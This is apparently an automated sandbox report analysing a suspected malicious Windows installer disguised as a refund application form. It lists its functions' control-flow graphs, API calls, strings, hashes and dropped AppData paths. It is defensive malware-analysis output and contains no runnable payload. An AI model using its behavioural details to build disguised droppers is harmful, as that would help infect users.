                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 139 405461-40547c 140 405482-405549 GetDlgItem * 3 call 404266 call 404bbf GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40560b-405612 139->141 162 405567-40556a 140->162 163 40554b-405565 SendMessageW * 2 140->163 143 405614-405636 GetDlgItem CreateThread CloseHandle 141->143 144 40563c-405649 141->144 143->144 146 405667-405671 144->146 147 40564b-405651 144->147 151 405673-405679 146->151 152 4056c7-4056cb 146->152 149 405653-405662 ShowWindow * 2 call 404266 147->149 150 40568c-405695 call 404298 147->150 149->146 159 40569a-40569e 150->159 157 4056a1-4056b1 ShowWindow 151->157 158 40567b-405687 call 40420a 151->158 152->150 155 4056cd-4056d3 152->155 155->150 164 4056d5-4056e8 SendMessageW 155->164 160 4056c1-4056c2 call 40420a 157->160 161 4056b3-4056bc call 405322 157->161 158->150 160->152 161->160 168 40557a-405591 call 404231 162->168 169 40556c-405578 SendMessageW 162->169 163->162 170 4057ea-4057ec 164->170 171 4056ee-405719 CreatePopupMenu call 4062dc AppendMenuW 164->171 178 405593-4055a7 ShowWindow 168->178 179 4055c7-4055e8 GetDlgItem SendMessageW 168->179 169->168 170->159 176 40571b-40572b GetWindowRect 171->176 177 40572e-405743 TrackPopupMenu 171->177 176->177 177->170 181 405749-405760 177->181 182 4055b6 178->182 183 4055a9-4055b4 ShowWindow 178->183 179->170 180 4055ee-405606 SendMessageW * 2 179->180 180->170 184 405765-405780 SendMessageW 181->184 185 4055bc-4055c2 call 404266 182->185 183->185 184->184 186 405782-4057a5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4057a7-4057ce SendMessageW 186->188 188->188 189 4057d0-4057e4 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                        • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405636
                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                      • ShowWindow.USER32(0001040A,00000008), ref: 0040565F
                                                                                                                                      • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                      • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                      • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                      • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                      • String ID: {
                                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                                      • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                      • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                      • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                      • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                                                                                      Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,771B3420,004059EC,?,C:\Users\user~1\AppData\Local\Temp\,771B3420), ref: 00406608
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406614
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                      • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                      • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                                                                                                      • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                      • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                                                                                                                      Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                      • Opcode ID: 115c5d433e14c96260f9e46262acef96b25dd7cb937b0ec189ae6923d83c572a
                                                                                                                                      • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                                                                                      • Opcode Fuzzy Hash: 115c5d433e14c96260f9e46262acef96b25dd7cb937b0ec189ae6923d83c572a
                                                                                                                                      • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                                                                                                                      Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 190 403d58-403d6a 191 403d70-403d76 190->191 192 403eab-403eba 190->192 191->192 193 403d7c-403d85 191->193 194 403f09-403f1e 192->194 195 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 192->195 198 403d87-403d94 SetWindowPos 193->198 199 403d9a-403d9d 193->199 196 403f20-403f23 194->196 197 403f5e-403f63 call 40427d 194->197 195->194 201 403f25-403f30 call 401389 196->201 202 403f56-403f58 196->202 209 403f68-403f83 197->209 198->199 204 403db7-403dbd 199->204 205 403d9f-403db1 ShowWindow 199->205 201->202 223 403f32-403f51 SendMessageW 201->223 202->197 208 4041fe 202->208 210 403dd9-403ddc 204->210 211 403dbf-403dd4 DestroyWindow 204->211 205->204 216 404200-404207 208->216 214 403f85-403f87 call 40140b 209->214 215 403f8c-403f92 209->215 219 403dde-403dea SetWindowLongW 210->219 220 403def-403df5 210->220 217 4041db-4041e1 211->217 214->215 226 403f98-403fa3 215->226 227 4041bc-4041d5 DestroyWindow EndDialog 215->227 217->208 225 4041e3-4041e9 217->225 219->216 221 403e98-403ea6 call 404298 220->221 222 403dfb-403e0c GetDlgItem 220->222 221->216 228 403e2b-403e2e 222->228 229 403e0e-403e25 SendMessageW IsWindowEnabled 222->229 223->216 225->208 231 4041eb-4041f4 ShowWindow 225->231 226->227 232 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 226->232 227->217 233 403e30-403e31 228->233 234 403e33-403e36 228->234 229->208 229->228 231->208 260 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 232->260 261 403ff8-403ffd 232->261 237 403e61-403e66 call 40420a 233->237 238 403e44-403e49 234->238 239 403e38-403e3e 234->239 237->221 243 403e7f-403e92 SendMessageW 238->243 244 403e4b-403e51 238->244 242 403e40-403e42 239->242 239->243 242->237 243->221 248 403e53-403e59 call 40140b 244->248 249 403e68-403e71 call 40140b 244->249 258 403e5f 248->258 249->221 257 403e73-403e7d 249->257 257->258 258->237 264 404041 260->264 265 40403e-40403f 260->265 261->260 266 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404073-404084 SendMessageW 266->267 268 404086 266->268 269 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 267->269 268->269 269->209 280 4040d1-4040d3 269->280 280->209 281 4040d9-4040dd 280->281 282 4040fc-404110 DestroyWindow 281->282 283 4040df-4040e5 281->283 282->217 284 404116-404143 CreateDialogParamW 282->284 283->208 285 4040eb-4040f1 283->285 284->217 286 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 284->286 285->209 287 4040f7 285->287 286->208 292 4041a2-4041b5 ShowWindow call 40427d 286->292 287->208 294 4041ba 292->294 294->217
                                                                                                                                      APIs
                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                      • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                      • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                      • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                      • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3282139019-0
                                                                                                                                      • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                      • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                                                                                      • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                      • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                                                                                                      Function 004039AA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 295 4039aa-4039c2 call 406694 298 4039c4-4039d4 call 406201 295->298 299 4039d6-403a0d call 406188 295->299 308 403a30-403a59 call 403c80 call 405c97 298->308 304 403a25-403a2b lstrcatW 299->304 305 403a0f-403a20 call 406188 299->305 304->308 305->304 313 403aeb-403af3 call 405c97 308->313 314 403a5f-403a64 308->314 320 403b01-403b26 LoadImageW 313->320 321 403af5-403afc call 4062dc 313->321 314->313 316 403a6a-403a92 call 406188 314->316 316->313 322 403a94-403a98 316->322 324 403ba7-403baf call 40140b 320->324 325 403b28-403b58 RegisterClassW 320->325 321->320 326 403aaa-403ab6 lstrlenW 322->326 327 403a9a-403aa7 call 405bbc 322->327 338 403bb1-403bb4 324->338 339 403bb9-403bc4 call 403c80 324->339 328 403c76 325->328 329 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 325->329 333 403ab8-403ac6 lstrcmpiW 326->333 334 403ade-403ae6 call 405b8f call 4062ba 326->334 327->326 332 403c78-403c7f 328->332 329->324 333->334 337 403ac8-403ad2 GetFileAttributesW 333->337 334->313 341 403ad4-403ad6 337->341 342 403ad8-403ad9 call 405bdb 337->342 338->332 348 403bca-403be4 ShowWindow call 406624 339->348 349 403c4d-403c4e call 4053f5 339->349 341->334 341->342 342->334 354 403bf0-403c02 GetClassInfoW 348->354 355 403be6-403beb call 406624 348->355 353 403c53-403c55 349->353 356 403c57-403c5d 353->356 357 403c6f-403c71 call 40140b 353->357 360 403c04-403c14 GetClassInfoW RegisterClassW 354->360 361 403c1a-403c3d DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c63-403c6a call 40140b 356->362 357->328 360->361 366 403c42-403c4b call 4038fa 361->366 362->338 366->332
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                        • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                      • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",00000000), ref: 00403A2B
                                                                                                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\argoters\Necrotizing,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403AAB
                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\argoters\Necrotizing,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AC9
                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\argoters\Necrotizing), ref: 00403B12
                                                                                                                                        • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                      • String ID: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\argoters\Necrotizing$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                      • API String ID: 1975747703-2540215471
                                                                                                                                      • Opcode ID: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                                                                                                                      • Instruction ID: 064cc6771aa4ec85c149aa806f0e8f7fc9ed350ba8b4bb786133750ec3f232c3
                                                                                                                                      • Opcode Fuzzy Hash: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                                                                                                                      • Instruction Fuzzy Hash: 9061A7312007007ED720AF669D46E2B3A6CEB85B4AF40157FF945B51E2CBBDA941CB2D
                                                                                                                                      Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 372 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 403331 384->387 386->387 395 402f9a-402fa1 387->395 396 4030bc-4030c4 call 402e79 387->396 391 403067-40307f call 403347 call 403331 388->391 392 403089-4030b3 GlobalAlloc call 403347 call 403116 388->392 389->374 391->389 417 403081-403087 391->417 392->389 416 4030c6-4030d7 392->416 400 402fa3-402fb7 call 405d6b 395->400 401 40301d-403021 395->401 396->389 406 40302b-403031 400->406 420 402fb9-402fc0 400->420 405 403023-40302a call 402e79 401->405 401->406 405->406 411 403040-40304a 406->411 412 403033-40303d call 406787 406->412 411->384 415 403050 411->415 412->411 415->381 421 4030d9 416->421 422 4030df-4030e4 416->422 417->389 417->392 420->406 424 402fc2-402fc9 420->424 421->422 426 4030e5-4030eb 422->426 424->406 425 402fcb-402fd2 424->425 425->406 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d6b 426->428 427->406 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->374 433->415 433->434 434->406 435 403019-40301b 434->435 435->406
                                                                                                                                      APIs
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                        • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                        • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                                                                                                                      • Null, xrefs: 00402FD4
                                                                                                                                      • Inst, xrefs: 00402FC2
                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                      • "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe", xrefs: 00402EDD
